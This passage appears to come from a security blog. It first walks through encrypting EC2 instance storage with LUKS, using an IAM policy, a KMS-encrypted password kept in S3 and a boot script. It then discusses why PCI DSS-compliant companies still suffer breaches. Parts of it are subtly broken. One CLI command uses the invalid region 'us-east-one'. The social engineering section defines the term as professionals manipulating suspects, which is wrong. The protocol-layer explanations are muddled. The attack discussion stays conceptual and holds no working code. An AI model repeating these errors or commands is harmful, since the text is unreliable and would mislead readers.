  2. Then go to the navigation pane to and select “policies”
  3. Afterward, click the “Create Policy” option.
  4. Then, select the “Create Your Own Policy” option.
  5. Get a name for the policy and a great description for it then proceed with the next step.
  6. Copy and paste the following policy at this point.
    {
    
        "Version": "2012-10-17",
    
        "Statement": [
    
            {
    
                "Sid": "Stmt1478729875000",
    
                "Effect": "Allow",
    
                "Action": [
    
                    "s3:GetObject"
    
                ],
    
                "Resource": [
    
                    "arn:aws:s3:::<your-bucket-name>/LuksInternalStorageKey"
    
                ]
    
            }
    
        ]
    
    }
  7. Then, select “Create Policy”.
  8. To elaborate on the previous policy, the bucket is granted through such policy to read. In other words, the encrypted password could be read because it is stored

    insidesuch bucket. The IAM role then needs configuration now since EC2 fundamentally uses the previous policy.

  9. One should select “Roles”  inside the IAM console.
  10. Choose “Create New Role” now.
  11. Inside the first step of “Role Name”, create a name for the role and then press “Next Step”.
  12. Inside the second step of “Select Role Type”, select “Amazon EC2” and then press “Next Step”.
  13. Inside the third step of “Established Trust”, press “Next Step”.
  14. Inside the fourth step of “Attach Policy”, select the policy created in the first step. The following figure illustrates this point in a more concise way. amazon ec2
  15. Inside the fifth step of “Review”, review the configuration before finishing the steps. The IAM role which we just created can be used now with any new launch of EC2 instances, having an access permission on encrypted password file stored in the S3 bucket.
  16. The newly created IAM role becomes listed on the page of “Roles” there.
  17. Finally, select “Roles” and then select the newly created role as illustrated by the upcoming image. class=

3.Encrypt a secret password with KMS and store it inside S3 bucket

In order to accomplish this step successfully, one has to utilize AWS CLI. Fortunately, EC2 Amazon Linux instances already have AWS CLI by default on them. One could further install it on Windows, Mac, or Linux systems as well.

  1. Type the following command in AWS CLI. It will make use of KMS to encrypt the password. Note that you should replace “region name” with your region. In addition, creating keys and putting objects in S3 requires specific permissions that must be present before typing this command.
    aws --region us-east-one kms encrypt --key-id 'alias/EncFSForEC2InternalStorageKey' --plaintext "ThisIs-a-SecretPassword" --query CiphertextBlob --output text | base64 --decode > LuksInternalStorageKey
    
    aws s3 cp LuksInternalStorageKey s3://<bucket-name>/LuksInternalStorageKey
  2. The file name “LuksInternalStorageKey” will have the encrypted password as per the last used command.
  3. The key alias or name, which is useful for identifying diverse keys, has the name “EncFSForEC2InternalStorageKey”

 

  1. Make the KMS key accessible by the role

  1. Get to the IAM console and especially the navigation pane and choose “Encryption keys”.
  2. Then, choose the key alias named “EncFSForEC2InternalStorageKey”.
  3. If a new role is desired to get installed, and it is actually desired, then “Key Policy” should be scrolled down to it where “Add” should be selected under “Key Users” amazon ec2
  4. At this step, choose the newly created role and then press “Attach”.
  5. Now, this grants the access permission of the key to the role.

 

  1. Configure EC2 with role and configurations run

  1. Launch a new instance inside the EC2 console. But inside the third step “Configure Instance Details”, the IAM role has to be selected as shown in the following figure. amazoon ec2
  2. Expand the section of “Advanced Details” to the previously displayed screen.
  3. Inside “User Data, keep “As text” checked as it is by default. Then, copy and paste the following script into the text box.
    #!/bin/bash
    ## Initial setup to be executed on boot
    
    ##====================================
    
    
    # Create an empty file. This file will be used to host the file system.
    
    # In this example we create a 2 GB file called secretfs (Secret File System).
    
    dd of=secretfs bs=1G count=0 seek=2
    
    # Lock down normal access to the file.
    
    chmod 600 secretfs
    
    # Associate a loopback device with the file.
    
    losetup /dev/loop0 secretfs
    
    #Copy encrypted password file from S3. The password is used to configure LUKE later on.
    
    aws s3 cp s3://an-internalstoragekeybucket/LuksInternalStorageKey .
    
    # Decrypt the password from the file with KMS, save the secret password in LuksClearTextKey
    
    LuksClearTextKey=$(aws --region us-east-1 kms decrypt --ciphertext-blob fileb://LuksInternalStorageKey --output text --query Plaintext | base64 --decode)
    
    # Encrypt storage in the device. cryptsetup will use the Linux
    
    # device mapper to create, in this case, /dev/mapper/secretfs.
    
    # Initialize the volume and set an initial key.
    
    echo "$LuksClearTextKey" | cryptsetup -y luksFormat /dev/loop0
    
    # Open the partition, and create a mapping to /dev/mapper/secretfs.
    
    echo "$LuksClearTextKey" | cryptsetup luksOpen /dev/loop0 secretfs
    
    # Clear the LuksClearTextKey variable because we don't need it anymore.
    
    unset LuksClearTextKey
    
    # Check its status (optional).
    
    cryptsetup status secretfs
    
    # Zero out the new encrypted device.
    
    dd if=/dev/zero of=/dev/mapper/secretfs
    
    # Create a file system and verify its status.
    
    mke2fs -j -O dir_index /dev/mapper/secretfs
    
    # List file system configuration (optional).
    
    tune2fs -l /dev/mapper/secretfs
    
    # Mount the new file system to /mnt/secretfs.
    
    mkdir /mnt/secretfs
    
    mount /dev/mapper/secretfs /mnt/secretfs
  4. On your account, enable CloudTrail.
  5. Finally, launch the EC2 instance. Such instance will copy the password file from S3, use KMS to decrypt the file, and configure an encrypted file system.

 

References

https://aws.amazon.com/blogs/security/how-to-protect-data-at-rest-with-amazon-ec2-instance-store-encryption/ http://searchhealthit.techtarget.com/definition/HIPAA https://aws.amazon.com/s3/ https://digitalguardian.com/blog/what-data-encryption https://en.wikipedia.org/wiki/Advanced_Encryption_Standard http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html

How to become PCI compliant and still be breached?

 What do I need to know PCI?

  • PCI DSS and PCI SSC:
    pci compliant

For the sake of minimizing this risk, there exists the Payment Card Industry Data Security Standard (PCI DSS). It is designed and set by the PCI Security Standards Council (PCI SSC). In a nutshell, it aims at securing online transactions to a great extent.

Credit card companies put these standards into action themselves. The standards compel every retailer to comply with a long checklist if they accept any means of online payments. This ensures that transactions operate in a completely safe environment. Such lists mainly strive to make sure that data and networks are highly secure.

  • Social Engineering:

    pci compliant

A computer security professional has to perform sorts of psychological manipulations on the suspects. This is in order to know who is responsible for the occurrence of an attack or another similar security incident.

Such terms get a wide usage when talking about information security in general. This is due to the fact that someone inside the organisation could reveal confidential data. Those responsible for information security ought to detect and investigate such persons.

In a way or another, many consider this as a confidence trick. The rationale behind it at the end of the day varies from information gathering to fraud, or system access. It is often one of the many steps in a more complex fraud scheme. It is used for diverse social sciences, yet computer security is the main domain of it.

There are a plenty of techniques one could utilize for the sake of performing a social engineering action. Instances of such methods are: pretexting, diversion theft, phishing, spear phishing, water holing, baiting, quid pro quo, tailgating, and many others.

  • SSL/TLS/IPsec

    pci compliant

In order to ensure a secure transmission of data packets across a network, one can depend on three internet protocols. This is in order to make such data secure as much as possible while on transit. Internet Protocol Security (IPsec) is capable of performing a mutual authentication between agents when the session begins. Transmission of cryptographic keys occurs during the session. This is either between a pair of hosts (host-to-host), between a pair of security gateways (network-to-network) or between a security gateway and a host (network-to-host).

It is important to understand that IPsec works for the Internet Layer. Elsewhere, there are two other similar internet protocols operating in other upper layers. The Transport Layer Security (TLS) operates in the Transport Layer. On the other hand, Secure Shell (SSH) functions in the Application Layer.

An insight into the problem

While there are several organizations which claim their complete compliance with PCI DSS, many still suffer attacks by actual breaches. This leads to losing a lot of their money and investment. We have to dig into the grounds of this problem in order to be able to take accurate actions accordingly.

First of all, let’s discuss the reasons for such status

  1. One hundred percent security is impossible and is unachievable by any means. Despite the fact that standards of PCI DSS are completely awesome and leading to much more secure online payment methods, they can never become the end or the ultimate goal of an organization.

There can never be perfect security for an organization. That is why banks still experience robberies up to date regardless of how secure they are. The only advantage of such standards lies in the fact that the number of successful robberies becomes much less but it never vanishes.
pci compliant

  1. Several methods are undertaken to manipulate the controls which are compliant with PCI standards. This leads to a breach even when there is PCI compliance for the organization. The following points discuss the said methods:
    1. Imagine that a professional attacker freshly develops a malware. This attacker manages to get his malware through all the antivirus or antimalware security systems inside the organization. This fact is pretty interesting. This is because such new malware usually has no signature to make it recognizable by an anti-malware software. Consequently, even while there is an antivirus running on the organization’s network or system, new malware could pass through without detection at the very beginning.
      pci compliant
    2. As it is known, a malware has just to find its way into the network and desired data could be collected in time. But how do you think the malware could get into the network in the first place? The answer is social engineering and spear phishing attack. This term refers to those emails which seem as if they are from a friend or someone inside an organization. However, the one who actually sent such emails was the same individual who attempts to attack the personal data such as passwords, credit card number, bank account numbers, and the financial information on your personal computer (PC). One way to perform such attack effectively is to send a link from a bunch of the organization’s email addresses to the addresses of other peers inside the same organization. Thereafter, when one simply clicks on the link on, the malware goes viral inside the network. That is why security training is highly recommendable to cut off the hazardous numbers of such attacks.
      pci compliant
    3. The problem here is that everything seems as if they are normal with no existence of a threat of such malware. Why is that? Fundamentally, when an attacker launches the malware that scans a network for open ports or other vulnerabilities, the scans are run in a very slow manner such that no heavy traffic generation occurs as a result of such scans. This fact leads to recognizing the traffic as if it is just normal. On the other hand, when a penetration tester attempts to scan a network vulnerability, high traffic generation occurs. It’s then detected as someone who tries to scan the network.  
      1. pci compliant
      2. Furthermore, the backdoor software utilized by an attacker depends on protocols such as SSL/TLS/IPsec. They depend on them to encrypt their transmissions on port numbers 80 or 443 which are both open for getting on the internet. Such encrypted packets are not usually recognizable as malware by antivirus software programs.

References

https://pciguru.wordpress.com/2013/02/06/how-to-be-pci-compliant-and-still-be-breached/

https://in.norton.com/spear-phishing-scam-not-sport/article

https://en.wikipedia.org/wiki/Social_engineering_(security)

https://en.wikipedia.org/wiki/IPsec